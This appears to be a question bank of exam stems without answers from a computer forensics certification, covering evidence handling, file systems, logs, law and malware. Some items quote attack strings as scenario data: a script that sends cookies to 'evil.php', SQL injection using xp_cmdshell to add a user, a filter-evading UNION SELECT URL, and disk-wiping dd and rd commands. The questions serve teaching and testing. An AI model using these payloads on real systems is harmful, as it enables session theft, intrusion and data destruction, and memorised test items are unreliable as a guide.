A cybercriminal is attempting to remove evidence from a Windows computer. He deletes the file evidence1.doc, sending it to Windows Recycle Bin. The cybercriminal then empties the Recycle Bin. After having been removed from the Recycle Bin, what will happen to the data?
Which of the following is a requirement for senders as per the CAN-SPAM act?
An investigator seized a notebook device installed with a Microsoft Windows OS. Which type of files would support an investigation of the data size and structure in the device?
Robert is a regional manager working in a reputed organization. One day, he suspected malware attack after unwanted programs started to popup after logging into his computer. The network administrator was called upon to trace out any intrusion on the computer and he/she finds that suspicious activity has taken place within Autostart locations. In this situation, which of the following tools is used by the network administrator to detect any intrusion on a system?
While collecting Active Transaction Logs using SQL Server Management Studio, the query Select * from ::fn_dblog(NULL, NULL) displays the active portion of the transaction log file. Here, assigning NULL values implies?
Which among the following acts has been passed by the U.S. Congress to protect investors from the possibility of fraudulent accounting activities by corporations?
Ronald, a forensic investigator, has been hired by a financial services organization to investigate an attack on their MySQL database server, which is hosted on a Windows machine named WIN-DTRAI83202X. Ronald wants to retrieve information on the changes that have been made to the database. Which of the following files should Ronald examine for this task?
Edgar is part of the FBI's forensic media and malware analysis team; he is analyzing a current malware and is conducting a thorough examination of the suspect system, network, and other connected devices. Edgar's approach is to execute the malware code to know how it interacts with the host system and its impacts on it. He is also using a virtual machine and a sandbox environment. What type of malware analysis is Edgar performing?
When installed on a Windows machine, which port does the Tor browser use to establish a network connection via Tor nodes?
The working of the Tor browser is based on which of the following concepts?
Fred, a cybercrime investigator for the FBI, finished storing a solid-state drive in a static resistant bag and filled out the chain of custody form. Two days later, John grabbed the solid-state drive and created a clone of it (with write blockers enabled) in order to investigate the drive. He did not document the chain of custody though. When John was finished, he put the solid-state drive back in the static resistant and placed it back in the evidence locker. A day later, the court trial began and upon presenting the evidence and the supporting documents, the chief justice outright rejected them. Which of the following statements strongly support the reason for rejecting the evidence?
When investigating a system, the forensics analyst discovers that malicious scripts were injected into benign and trusted websites. The attacker used a web application to send malicious code, in the form of a browser side script, to a different end-user. What attack was performed here?
A breach resulted from a malware attack that evaded detection and compromised the machine memory without installing any software or accessing the hard drive. What technique did the adversaries use to deliver the attack?
Which 'Standards and Criteria' under SWGDE states that 'the agency must use hardware and software that are appropriate and effective for the seizure or examination procedure'?
You are the incident response manager at a regional bank. While performing routine auditing of web application logs, you find several attempted login submissions that contain the following strings: < SCRIPT type="text/javascript" > var adr = '../evil.php?cakemonster=' + escape(document.cookie); < /SCRIPT > What kind of attack has occurred?
Fill in the missing Master Boot Record component. 1. Master boot code 2. Partition table 3. ____________
Which of the following Windows event logs record events related to device drives and hardware changes?
Robert needs to copy an OS disk snapshot of a compromised VM to a storage account in different region for further investigation. Which of the following should he use in this scenario?
Which of the following tools will allow a forensic investigator to acquire the memory dump of a suspect machine so that it may be investigated on a forensic workstation to collect evidentiary data like processes and Tor browser artifacts?
An investigator is examining a file to identify any potentially malicious content. To avoid code execution and still be able to uncover hidden indicators of compromise (IOC), which type of examination should the investigator perform?
You are a digital forensic investigator at a large pharmaceutical company. You are responding to a security incident where you have found a computer on the scene, and you believe the computer contains evidence that is valuable to the case. The computer is running, but the screen is blank. What should you do first?
On NTFS file system, which of the following tools can a forensic investigator use in order to identify timestomping of evidence files?
Which of the following Android libraries are used to render 2D (SGL) or 3D (OpenGL/ES) graphics content to the screen?
Jacob is a computer forensics investigator with over 10 years experience in investigations and has written over 50 articles on computer forensics. He has been called upon as a qualified witness to testify the accuracy and integrity of the technical log files gathered in an investigation into computer fraud. What is the term used for Jacob's testimony in this case?
What does Locard's exchange Principle state?
Which Linux command when executed displays kernel ring buffers or information about device drivers loaded into the kernel?
A file requires 10 KB space to be saved on a hard disk partition. An entire cluster of 32 KB has been allocated for this file. The remaining, unused space of 22 KB on this cluster will be identified as _______
One technique for hiding information is to change the file extension from the correct one to one that might not be noticed by an investigator. For example, changing a .jpg extension to a .doc extension so that a picture file appears to be a document. What can an investigator examine to verify that a file has the correct extension?
Identify the term that refers to individuals who, by virtue of their knowledge and expertise, express an independent opinion on a matter related to a case based on the information that is provided.
After a successful data exfiltration attack against your organization, you are conducting an internal investigation and suspect a significant portion of evidence exists on an end-user’s personal laptop. You want to be sure not to tip-off the laptop’s owner that an investigation is being conducted. What is the best option to obtain the evidence?
In forensics, _________ are used to view stored or deleted data from both files and disk sectors.
You are an information security analyst at a large pharmaceutical company. While performing a routine review of audit logs, you have noticed a significant amount of egress traffic to various IP addresses on destination port 22 during off-peak hours. You researched some of the IP addresses and found that many of them are in Eastern Europe. What is the most likely cause of this traffic?
What do you call the process of studying the changes that have taken place across a system or a machine after a series of actions or incidents?
This is a statement, other than one made by the declarant while testifying at the trial or hearing, offered in evidence to prove the truth of the matter asserted. Which among the following is suitable for the above statement?
Data density of a disk drive is calculated by using _____.
For the purpose of preserving the evidentiary chain of custody, which of the following labels is not appropriate?
James, a hacker, identifies a vulnerability in a website. To exploit the vulnerability, he visits the login page and notes down the session ID that is created. He appends this session ID to the login URL and shares the link with a victim. Once the victim logs into the website using the shared URL, James reloads the webpage (containing the URL with the session ID appended) and now, he can browse the active session of the victim. Which attack did James successfully execute?
Consider a scenario where a forensic investigator is performing malware analysis on a memory dump acquired from a victim's computer. The investigator uses Volatility Framework to analyze RAM contents: which plugin helps investigator to identify hidden processes or injected code/DLL in the memory dump?
Jacob, a cybercrime investigator, joined a forensics team to participate in a criminal case involving digital evidence. After the investigator collected all the evidence and presents it to the court, the judge dropped the case and the defense attorney pressed charges against Jacob and the rest of the forensics team for unlawful search and seizure. What forensics privacy issue was not addressed prior to collecting the evidence?
Consider that you are investigating a machine running an Windows OS released prior to Windows Vista. You are trying to gather information about the deleted files by examining the master database file named INFO2 located at C:\Recycler\<USER SID>\. You read an entry named "Dd5.exe". What does Dd5.exe mean?
An investigator wants to extract passwords from SAM and System Files. Which tool can the investigator use to obtain a list of users, passwords, and their hashes in this case?
Which of the following statements is true with respect to SSDs (solid-state drives)?
Which cloud model allows an investigator to acquire the instance of a virtual machine and initiate the forensics examination process?
Storage location of Recycle Bin for NTFS file systems (Windows Vista and later) is located at:
In Java, when multiple applications are launched, multiple Dalvik Virtual Machine instances occur that consume memory and time. To avoid that, Android implements a process that enables low memory consumption and quick start-up time. What is the process called?
Which of the following attacks refers to unintentional download of malicious software via the Internet? Here, an attacker exploits flaws in browser software to install malware merely by the user visiting the malicious website.
An EC2 instance storing critical data of a company got infected with malware. The forensics team took the EBS volume snapshot of the affected instance to perform further analysis and collected other data of evidentiary value. What should be their next step?
Cloud forensic investigations impose challenges related to multi-jurisdiction and multi-tenancy aspects. To have a better understanding of the roles and responsibilities between the cloud service provider (CSP) and the client, which document should the forensic investigator review?
William is examining a log entry that reads 192.168.0.1 - - [18/Jan/2020:12:42:29 +0000] "GET / HTTP/1.1" 200 1861. Which of the following logs does the log entry belong to?
Adam is thinking of establishing a hospital in the US and approaches John, a software developer to build a site and host it for him on one of the servers, which would be used to store patient health records. He has learned from his legal advisors that he needs to have the server's log data reviewed and managed according to certain standards and regulations. Which of the following regulations are the legal advisors referring to?
The information security manager at a national legal firm has received several alerts from the intrusion detection system that a known attack signature was detected against the organization's file server. What should the information security manager do first?
Which of the following Registry components include offsets to other cells as well as the LastWrite time for the key?
You are assigned a task to examine the log files pertaining to MyISAM storage engine. While examining, you are asked to perform a recovery operation on a MyISAM log file. Which among the following MySQL Utilities allow you to do so?
Annie is searching for certain deleted files on a system running Windows XP OS. Where will she find the files if they were not completely deleted from the system?
Williamson is a forensic investigator. While investigating a case of data breach at a company, he is maintaining a document that records details such as the forensic processes applied on the collected evidence, particulars of people handling it, the dates and times when it is being handled, and the place of storage of the evidence. What do you call this document?
Smith, an employee of a reputed forensic investigation firm, has been hired by a private organization to investigate a laptop that is suspected to be involved in the hacking of the organization's DC server. Smith wants to find all the values typed into the Run box in the Start menu. Which of the following registry keys will Smith check to find the above information?
Matthew has been assigned the task of analyzing a suspicious MS Office document via static analysis over an Ubuntu-based forensic machine. He wants to see what type of document it is, whether it is encrypted, or contains any flash objects/VBA macros. Which of the following python-based script should he run to get relevant information?
Smith, a network administrator with a large MNC, was the first to arrive at a suspected crime scene involving criminal use of compromised computers. What should be his first response while maintaining the integrity of evidence?
Jacky encrypts her documents using a password. It is known that she uses her daughter's year of birth as part of the password. Which password cracking technique would be optimal to crack her password?
Which set of anti-forensic tools/techniques allows a program to compress and/or encrypt an executable file to hide attack tools from being detected by reverse-engineering or scanning?
What command-line tool enables forensic investigator to establish communication between an Android device and a forensic workstation in order to perform data acquisition from the device?
Which of the following statements pertaining to First Response is true?
Which following forensic tool allows investigator to detect and extract hidden streams on NTFS drive?
Which of the following is the most effective tool for acquiring volatile data from a Windows-based system?
During an investigation, the first responders stored mobile devices in specific containers to provide network isolation. All the following are examples of such pieces of equipment, except for:
Place the following in order of volatility from most volatile to the least volatile.
Which Federal Rule of Evidence speaks about the Hearsay exception where the availability of the declarant is immaterial and certain characteristics of the declarant such as present sense impression, excited utterance, and recorded recollection are also observed while giving their testimony?
What is the extension used by Windows OS for shortcut files present on the machine?
An International Mobile Equipment Identifier (IMEI) is a 15-digit number that indicates the manufacturer, model type, and country of approval for GSM devices. The first eight digits of an IMEI number that provide information about the model and origin of the mobile device is also known as:
BMP (Bitmap) is a standard file format for computers running the Windows operating system. BMP images can range from black and white (1 bit per pixel) up to 24 bit color (16.7 million colors). Each bitmap file contains a header, the RGBQUAD array, information header, and image data. Which of the following element specifies the dimensions, compression type, and color format for the bitmap?
Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?
Which among the following web application threats is resulted when developers expose various internal implementation objects, such as files, directories, database records, or key-through references?
Which of the following Event Correlation Approach is an advanced correlation method that assumes and predicts what an attacker can do next after the attack by studying the statistics and probability and uses only two variables?
A clothing company has recently deployed a website on its latest product line to increase its conversion rate and base of customers. Andrew, the network administrator recently appointed by the company, has been assigned with the task of protecting the website from intrusion and vulnerabilities. Which of the following tool should Andrew consider deploying in this scenario?
Which ISO Standard enables laboratories to demonstrate that they comply with quality assurance and provide valid results?
A forensic analyst has been tasked with investigating unusual network activity inside a retail company's network. Employees complain of not being able to access services, frequent rebooting, and anomalies in log files. The investigator requested log files from the IT administrator and after carefully reviewing them, he finds the following log entry: 12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah” or 1=1 – 12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah” or) 1=1 (-- 12:34:35 192.2.3.4 HEAD GET /login.asp?username+blah” or exec master..xp_cmdshell ‘net user test testpass-- What type of attack was performed on the companies' web application?
Tony, an email marketing professional, is accused of enticing people to reveal their personal information such as banking credentials, credit card details, bank details, etc. via phishing emails. What type of investigation will apply to Tony’s case?
_____________ allows a forensic investigator to identify the missing links during investigation.
Self-Monitoring, Analysis, and Reporting Technology (SMART) is built into the hard drives to monitor and report system activity. Which of the following is included in the report generated by SMART?
Mark works for a government agency as a cyber-forensic investigator. He has been given the task of restoring data from a hard drive. The partition of the hard drive was deleted by a disgruntled employee in order to hide their nefarious actions. What tool should Mark use to restore the data?
An investigator needs to perform data acquisition from a storage media without altering its contents to maintain the integrity of the content. The approach adopted by the investigator relies upon the capacity of enabling read-only access to the storage media. Which tool should the investigator integrate into his/her procedures to accomplish this task?
A call detail record (CDR) provides metadata about calls made over a phone service. From the following data fields, which one is not contained in a CDR.
Which tool allows dumping the contents of process memory without stopping the process?
Web browsers can store relevant information from user activities. Forensic investigators may retrieve files, lists, access history, cookies, among other digital footprints. Which tool can contribute to this task?
In exceptional circumstances, where a person finds it necessary to access original data held on a computer or on storage media, that person must be competent to do so and be able to explain his/her actions and the impact of those actions on the evidence, in the court. Which ACPO principle states this?
Which of the following tools is used dump the memory of a running process, either immediately or when an error condition occurs?
POP3 is an internet protocol used to retrieve emails from a mail server. Through which port does an email client connect with a POP server?
Which of the following are small pieces of data sent from a website and stored on the user's computer by the user's web browser to track, validate, and maintain specific user information?
Depending upon the jurisdictional areas, different laws apply to different incidents. Which of the following law is related to fraud and related activity in connection with computers?
Charles has accidentally deleted an important file while working on his Mac computer. He wants to recover the deleted file as it contains some of his crucial business secrets. Which of the following tool will help Charles?
Which of the following files stores information about a local Google Drive installation such as User email ID, Local Sync Root Path, and Client version installed?
An expert witness is a __________________ who is normally appointed by a party to assist the formulation and preparation of a party's claim or defense.
Which among the following is an act passed by the U.S. Congress in 2002 to protect investors from the possibility of fraudulent accounting activities by corporations?
Billy, a computer forensics expert, has recovered a large number of DBX files during the forensic investigation of a laptop. Which of the following email clients can he use to analyze the DBX files?
Identify the file system that uses $BitMap file to keep track of all used and unused clusters on a volume.
The Apache server saves diagnostic information and error messages that it encounters while processing requests. The default path of this file is usr/local/apache/logs/error.log in Linux. Identify the Apache error log from the following logs.
Which part of Metasploit framework helps users to hide the data related to a previously deleted file or currently unused by the allocated file?
Event correlation is the process of finding relevance between the events that produce a final result. What type of correlation will help an organization to correlate events across a set of servers, systems, router and network?
What malware analysis operation can the investigator perform using the jv16 tool?
A Linux system is undergoing investigation. In which directory should the investigators look for its current state data if the system is in powered on state?
Derrick, a forensic specialist, was investigating an active computer that was executing various processes. Derrick wanted to check whether this system was used in an incident that occurred earlier. He started inspecting and gathering the contents of RAM, cache, and DLLs to identify incident signatures. Identify the data acquisition method employed by Derrick in the above scenario.
What happens to the header of the file once it is deleted from the Windows OS file systems?
Steve received a mail that seemed to have come from her bank. The mail has instructions for Steve to click on a link and provide information to avoid the suspension of her account. The link in the mail redirected her to a form asking for details such as name, phone number, date of birth, credit card number or PIN, CVV code, SNNs, and email address. On a closer look, Steve realized that the URL of the form in not the same as that of her bank's. Identify the type of external attack performed by the attacker in the above scenario?
Identify the location of Recycle Bin on a Windows 7 machine that uses NTFS file system to store and retrieve files on the hard disk.
In a Filesystem Hierarchy Standard (FHS), which of the following directories contains the binary files required for working?
James, a forensics specialist, was tasked with investigating a Windows XP machine that was used for malicious online activities. During the investigation, he recovered certain deleted files from Recycle Bin to identify attack clues. Identify the location of Recycle Bin in Windows XP system.
Which code does the FAT file system use to mark the file as deleted?
What is the investigator trying to view by issuing the command displayed in the following screenshot?
While analyzing a hard disk, the investigator finds that the file system does not use UEFI-based interface. Which of the following operating systems is present on the hard disk?
Which of the following tools can be used to parse the contents of .lnk files to reveal information embedded within the files?
Which of the following is found within the unique instance ID key and helps investigators to map the entry from USBSTOR key to the MountedDevices key?
Which event correlation approach is used to monitor the computer’s and computer users’ behavior to provide an alert if something anomalous is found?
Which of the following examinations refers to the process of the witness being questioned by the attorney who called the letter to the stand?
Which of the following SQL query can a forensic investigator use to retrieve the active Transaction Log files for a specific database?
In which attack does an attacker place a virtual machine (VM) in proximity to target cloud server, and take advantage of shared physical resources (processor cache) to extract cryptographic keys/plain text secrets to steal the victim’s credentials?
Tasklist command displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer. Which of the following tasklist commands provides information about the listed processes, including the image name, PID, name, and number of the session for the process?
Which of the following examinations refers to the process of providing the opposing side in a trial the opportunity to question a witness?
On a Linux system, what is the command "dcfldd if=/dev/sda of=usbimg.dat” used for?
NTFS sets a flag for the file once you encrypt it and creates an EFS attribute where it stores Data Decryption Field (DDF) and Data Recovery Field (DDR). Which of the following is not a part of DDF?
NTFS has reduced slack space than FAT, thus having lesser potential to hide data in the slack space. This is because:
What is the framework used for application development for iOS-based mobile devices?
Which of the following application password cracking tool can discover all password-protected items on a computer and decrypts them?
By examining which registry location in the Gilchrist’s system did Robert prove that the hacker has been connected to the XYZ wireless network?
Shane has started the static analysis of a malware and is using the tool ResourcesExtract to find more details of the malicious program. What part of the analysis is he performing?
The Run rd /s /q C:\$Recycle.bin command is executed on a Windows machine to.
Shane a forensic specialist, is investigating an ongoing attack on a MySQL database server hosted on a Windows machine with SID "WIN-ABCDE12345F." What log will help Shane in tracking all the client connections and activities performed on database server?
What must an attorney do first before you are called to testify as an expert?
Raw data acquisition format creates ____________of a data set or suspect drive.
Which of the following is a part of a Solid-State Drive (SSD)?
Which of the following files gives information about the client sync sessions in Google Drive on Windows?
Which of the following will create lost clusters?
Dan, a hacker, built an attractive website that has buttons and images containing text on each of them saying 'Click here to win an iPhone, Facebook a free trip to New York', and so on. Over these buttons, Dan loads an iframe in such a way that when a user clicks on any of those buttons or images, malware will be downloaded in their systems. What type of attack is Dan attempting in this scenario?
Which of the following is a precomputed table containing word lists like dictionary files and brute force lists and their hash values?
Which of the following does not describe the type of data density on a hard disk?
During forensics investigations, investigators tend to collect the system time at first and compare it with UTC. What does the abbreviation UTC stand for?
Adam, a forensic analyst, is preparing VMs for analyzing malware. Which of the following is NOT a best practice?
What is the role of Alloc.c in Apache core?
In which of the following attackers does an attacker duplicate the body of the SOAP message and send it to the server impersonating a legitimate user, thereby accessing the cloud resources as the legitimate user?
You are asked to perform forensics on a MAC operating system. What kind of information would you obtain when you issue the stat command, followed by its supporting switches in the MAC terminal?
Which of the following reports are delivered under oath to a board of directors/managers/panel of the jury?
Which Federal rule of evidence states that a duplicate is admissible to the same extent as an original unless (1) a genuine question is raised as to the authenticity of the original or (2) in the circumstances it would be unfair to admit the duplicate in lieu of the original?
Which of the following email headers specifies an address for mailer-generated errors, like 'no such user' bounce messages, to go to (instead of the sender's address)?
Identify the RAID level represented below:
Which of the following attack uses HTML tag like <script></script>?
Select the tool appropriate for examining the dynamically linked libraries of an application or malware.
Which of the following functions of a log management system involves calculation of the message digest for each file and storing the message digest securely to ensure detection of the changes made to the archived logs?
After suspecting a change in MS-Exchange Server storage archive, the investigator has analyzed it. Which of the following components is not an actual part of the archive?
What is the default IIS log location?
Which file system developed by Apple, Inc., uses Unicode to name the files and folders within the system?
In a centralized logging mechanism, what is the purpose of a local SEM server?
What is the investigator trying to analyze if the system gives the following image as output?
Which of the following is a federal law enacted in the US to control the ways that financial institutions deal with the private information of individuals?
Which of the following is the record of the characteristics of a file system, including its size, the block size, the empty and the filled blocks and their respective counts, the size and location of the inode tables, the disk block map and usage information, and the size of the block groups?
What system details can an investigator obtain from the NetBIOS name table cache?
Steve, a system engineer in an organization, is facing allegations of uploading child pornography videos from his office computer. What type of investigation should be carried against him?
Joshua is analyzing an MSSQL database for finding the attack evidence and other details, where should he look for the database logs?
Which among the following search warrants allows the first responder to get the victim's computer information such as service records, billing records, and subscriber information from the service provider?
Which among the following is an OLE compound file saved in Binary Interchange File Format (BIFF)?
Robert was arrested under child pornography case for uploading child pornography videos to a website. FBI seized all the digital devices pertaining to the case and a forensic investigator was hired to carry out the investigation. The investigator suspected that the perpetrator might have performed the task online through the web browser. He also found that the suspect’s web browser history was cleared, which drew a better insight into the case. To recover the deleted browser artifacts and the Internet history from the web browser, which of the following tools is used by the forensic investigator?
Which network attack is described by the following statement? 'At least five Russian major banks came under a continuous hacker attack, although online client services were not disrupted. The attack came from a wide-scale botnet involving at least 24,000 computers, located in 30 countries.'
Jason discovered a file named $RIYG6VR.doc in the C:\$Recycle.Bin\<USER SID>\ while analyzing a hard disk image for the deleted data. What inferences can he make from the file name?
The surface of a hard disk consists of several concentric rings known as tracks; each of these tracks has smaller partitions called disk blocks. What is the size of each block?
An insider in an organization deleted all the files containing sensitive information from his Windows 7 machine on the last day of his work at the organization. These deleted files would be stored in the Recycle Bin. But, to make them untraceable, he even deleted the INFO2 file from its location, which means that no files would appear in the Recycle Bin. Now, as a forensic expert, what would you do to get the deleted files back to the Recycle Bin?
In which registry does the system store the Microsoft security IDs?
What is the primary function of the tool CHKDSK in Windows that authenticates the file system reliability of a volume?
A forensic examiner is examining a Windows system seized from a crime scene. During the examination of a suspect file, he discovered that the file is password protected. He tried guessing the password using the suspect's available information but without any success. Which of the following tool can help the investigator to solve this issue?
Which file is a sequence of bytes organized into blocks understandable by the system's linker?
As a part of the investigation, Caroline, a forensic expert, was assigned the task to examine the transaction logs pertaining to a database named Transfers. She used SQL Server Management Studio to collect the active transaction log files of the database. Caroline wants to extract detailed information on the logs, including AllocUnitId, page id, slot id, etc. Which of the following commands does she need to execute in order to extract the desired information?
During the trial, an investigator observes that one of the principal witnesses is severely ill and cannot be present for the hearing. He decides to record the evidence and present it to the court. Under which rule should he present such evidence?
Which among the following U.S. laws requires financial institutions companies that offer consumers financial products or services such as loans, financial or investment advice, or insurance to protect their customers information against security threats?
Which command line tools is used to determine active network connections?
Which of the following tool can the investigator use to analyze the network to detect Trojan activities?
Which of the following processes is part of the dynamic malware analysis?
Which of the following is NOT a physical evidence?
Which password cracking technique uses details such as length of password, character sets used to construct the password, etc.?
Which of the following tool can reverse machine code to assembly language?
Which of the following techniques can be used to beat steganography?
Files stored in the Recycle Bin in its physical location are renamed as Dxy.ext, where `x` represents the ___________________.
Select the data that a virtual memory would store in a Windows-based system.
Investigators can use the Type Allocation Code (TAC) to find the model and origin of a mobile device. Where is TAC located in mobile devices?
Which of the following Data files store log-related information that could be useful in recovering databases?
iPhone OS stack consists of four abstraction layers. Which layer among these provides frameworks for iPhone app development?
Analyze the hex representation of mysql-bin.000013 file in the screenshot below. What do you infer from the hex data?
A US-based organization decided to implement a RAID storage technology for their data backup plan. John wants to setup a RAID level that requires a minimum of six drives but will meet high fault tolerance and with a high speed for the data read and write operations. What RAID level will John need to choose to meet this requirement?
What does the bytes 0x0B-0x53 represent in the boot sector of NTFS volume on Windows 2000?
What is the location of master database file INFO2 containing information about the deleted files in Windows systems prior to Windows Vista?
Which of the following tools will help you to recover deleted files in Mac OS X?
What is the purpose of command “dd if=mbr.backup of=/dev/xxx bs=512 count=1” on a Unix/Linux system?
Common Apache log format is %h%I%u%t\”%>s%b. What does %b represent in the log format?
Buffer overflow vulnerability of a web application occurs when it fails to guard its buffer properly and allows writing beyond its maximum size. Thus, it overwrites the_________. There are multiple forms of buffer overflow, including a Heap Buffer Overflow and a Format String Attack.
Which program uses different techniques to conceal a malware's code, thereby making it difficult for security mechanisms to detect or remove it?
Brian needs to acquire data from RAID storage. Which of the following acquisition methods is recommended to retrieve only the data relevant to the investigation?
Attackers exploit web applications using techniques, such as SQL injection. To avoid getting detected by the application firewall and IDS/IPS systems, attackers use various obfuscation techniques to bypass the security mechanisms. One such technique has been implemented in the URL given below. What is the technique implemented? https://www.websitename.com/accounts.php?id=1+UnIoN/**/SeLecT/**/1,2,3--
Which command line tool is used to detect network interfaces that are running in promiscuous mode?
Which of the following is a list of recently used programs or opened files?
Which block of the ICCID number on a SIM card represents the country code?
Which of these documents will help an investigator to determine the details of personnel responsible for evidence handling?
How will you categorize a cybercrime that took place within a CSP's cloud environment?
Randy has extracted data from an old version of a Windows-based system and discovered info file Dc5.txt in the system recycle bin. What does the file name denote?
Which of the following laws/rules of the USA deal with fraud and related activity in connection with computers?
CAN-SPAM act requires that you:
Identify the log management function in which each log data field is converted to a particular data representation and categorized consistently.
In the registry editor, the registry tree HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ contains information about each service on the machine. When you select a service, what should the value of Start key specific to that service, if the service starts up automatically?
Which MySQL log file contains information on a server start and stop?
Which of the following Perl scripts will help an investigator to access the executable image of a process?
Which of the following commands can be used by the forensic investigators to determine the details of open shared files on a server?
Madison is on trial for allegedly breaking into her university's internal network. The police raided her dorm room and seized all of her computer equipment. Madison's lawyer is trying to convince the judge that the seizure was unfounded and baseless. Under which US Amendment is Madison's lawyer trying to prove the police violated?
Which block in ext2 file system stores information about the size and shape of the Ext2 file system?
Email archiving is a systematic approach to save and protect the data contained in emails so that it can be accessed fast at a later date. There are two main archive types, namely Local Archive and Server Storage Archive. Which of the following statements is correct while dealing with local archives?
In a MYSQL DBMS, which uses MYISAM storage engine, the databases are stored as folders in the data directory and all the database tables are stored as files inside the database folders. These files carry the name of the tables and are categorized into specific file types (e.g., .myd, .myi, etc.). Which file type represents the table format?
Which of the following is a responsibility of the first responder?
Smith, as a part his forensic investigation assignment, seized a mobile device. He was asked to recover the Subscriber Identity Module (SIM) card data in the mobile device. Smith found that the SIM was protected by a Personal Identification Number (PIN) code, but he was also aware that people generally leave the PIN numbers to the defaults or use easily guessable numbers such as 1234. He made three unsuccessful attempts, which blocked the SIM card. What can Jason do in this scenario to reset the PIN and access SIM data?
Identify the NIST Publication that provides the required guidelines to help organizations to sanitize data to preserve the confidentiality of the information.
Which of these files helps a forensics investigator to locate the start-up files created by a malware infection on a Linux system?
Casey has acquired data from a hard disk in an open source acquisition format that allows her to generate compressed or uncompressed image files. What format did she use?
Which of the following is a MAC-based File Recovery Tool?
In Steganalysis, which of the following describes a Known-stego attack?
Which of the following registry hive gives the configuration information about which application was used to open various files on the system?
Which US law does the interstate or international transportation and receiving of child pornography fall under?
An investigator has acquired packed software and needed to analyze it for the presence of malice. Which of the following tools can help in finding the packaging software used?
Windows identifies which application to open a file with by examining which of the following?
You have completed a forensic investigation case. You would like to destroy the data contained in various disks at the forensics lab due to sensitivity of the case. How would you permanently erase the data on the hard disk?
On Linux/Unix based Web servers, what privilege should the daemon service be run under?
You are working as an independent computer forensics investigator and received a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a “simple backup copy” of the hard drive in the PC and put it on this drive and requests that you examine that drive for evidence of the suspected images. You inform him that a “simple backup copy” will not provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceeding?
A packet is sent to a router that does not have the packet destination address in its route table. How will the packet get to its proper destination?
You are working as a Computer forensics investigator for a corporation on a computer abuse case. You discover evidence that shows the subject of your investigation is also embezzling money from the company. The company CEO and the corporate legal counsel advise you to contact law enforcement and provide them with the evidence that you have found. The law enforcement officer that responds requests that you put a network sniffer on your network and monitor all traffic to the subject’s computer. You inform the officer that you will not be able to comply with that request because doing so would:
When reviewing web logs, you see an entry for resource not found in the HTTP status code field. What is the actual error code that you would see in the log for resource not found?
Preparing an image drive to copy files to is the first step in Linux forensics. For this purpose, what would the following command accomplish? dcfldd if=/dev/zero of=/dev/hda bs=4096 conv=noerror, sync
How many times can data be written to a DVD+R disk?
When making the preliminary investigations in a sexual harassment case, how many investigators are you recommended having?
What will the following command accomplish? dd if=/dev/xxx of=mbr.backup bs=512 count=1
What stage of the incident handling process involves reporting events?
Which of the following is a record of the characteristics of a file system, including its size, the block size, the empty and the filled blocks and their respective counts, the size and location of the inode tables, the disk block map and usage information, and the size of the block groups?
Software firewalls work at which layer of the OSI model?
What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?
You are working as Computer Forensics investigator and are called by the owner of an accounting firm to investigate possible computer abuse by one of the firm’s employees. You meet with the owner of the firm and discover that the company has never published a policy stating that they reserve the right to inspect their computing assets at will. What do you do?
Under which Federal Statutes does FBI investigate for computer crimes involving e-mail scams and mail fraud?
Simon is a former employee of Trinitron XML Inc. He feels he was wrongly terminated and wants to hack into his former company's network. Since Simon remembers some of the server names, he attempts to run the axfr and ixfr commands using DIG. What is Simon trying to accomplish here?
In conducting a computer abuse investigation you become aware that the suspect of the investigation is using ABC Company as his Internet Service Provider (ISP). You contact ISP and request that they provide you assistance with your investigation. What assistance can the ISP provide?
In Microsoft file structures, sectors are grouped together to form:
If you plan to startup a suspect's computer, you must modify the to ensure that you do not contaminate or alter data on the suspect's hard drive by booting to the hard drive.
Melanie was newly assigned to an investigation and asked to make a copy of all the evidence from the compromised system. Melanie did a DOS copy of all the files on the system. What would be the primary reason for you to recommend a disk imaging tool?
What method of computer forensics will allow you to trace all ever-established user accounts on a Windows 2000 server the course of its lifetime?
You should make at least how many bit-stream copies of a suspect drive?
Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests. What type of scan is Jessica going to perform?
To preserve digital evidence, an investigator should .
_______ is simply the application of Computer Investigation and analysis techniques in the interests of determining potential legal evidence.
What are the security risks of running a "repair" installation for Windows XP?
Julia is a senior security analyst for Berber Consulting group. She is currently working on a contract for a small accounting firm in Florida. They have given her permission to perform social engineering attacks on the company to see if their in-house training did any good. Julia calls the main number for the accounting firm and talks to the receptionist. Julia says that she is an IT technician from the company's main office in Iowa. She states that she needs the receptionist's network username and password to troubleshoot a problem they are having. Julia says that Bill Hammond, the CEO of the company, requested this information. After hearing the name of the CEO, the receptionist gave Julia all the information she asked for. What principal of social engineering did Julia use?
Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to hijack a session, using Ettercap, of a user connected to his Web server. Why will Jonathan not succeed?
Kimberly is studying to be an IT security analyst at a vocational school in her town. The school offers many different programming as well as networking languages. What networking protocol language should she learn that routers utilize?
After passively scanning the network of Department of Defense (DoD), you switch over to active scanning to identify live hosts on their network. DoD is a large organization and should respond to any number of scans. You start an ICMP ping sweep by sending an IP packet to the broadcast address. Only five hosts respond to your ICMP pings; definitely not the number of hosts you were expecting. Why did this ping sweep only produce a few responses?
You are a computer forensics investigator working with local police department and you are called to assist in an investigation of threatening emails. The complainant has printed out 27 email messages from the suspect and gives the printouts to you. You inform her that you will need to examine her computer because you need access to the in order to track the emails back to the suspect.
In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case?
Harold is a security analyst who has just run the rdisk /s command to grab the backup SAM files on a computer. Where should Harold navigate on the computer to find the file?
Larry is an IT consultant who works for corporations and government agencies. Larry plans on shutting down the city's network using BGP devices and zombies? What type of Penetration Testing is Larry planning to carry out?
You are contracted to work as a computer forensics investigator for a regional bank that has four 30 TB storage area networks that store customer data. What method would be most efficient for you to acquire digital evidence from this network?
How many bits is Source Port Number in TCP Header packet?
A(n) is one that's performed by a computer program rather than the attacker manually performing the steps in the attack sequence.
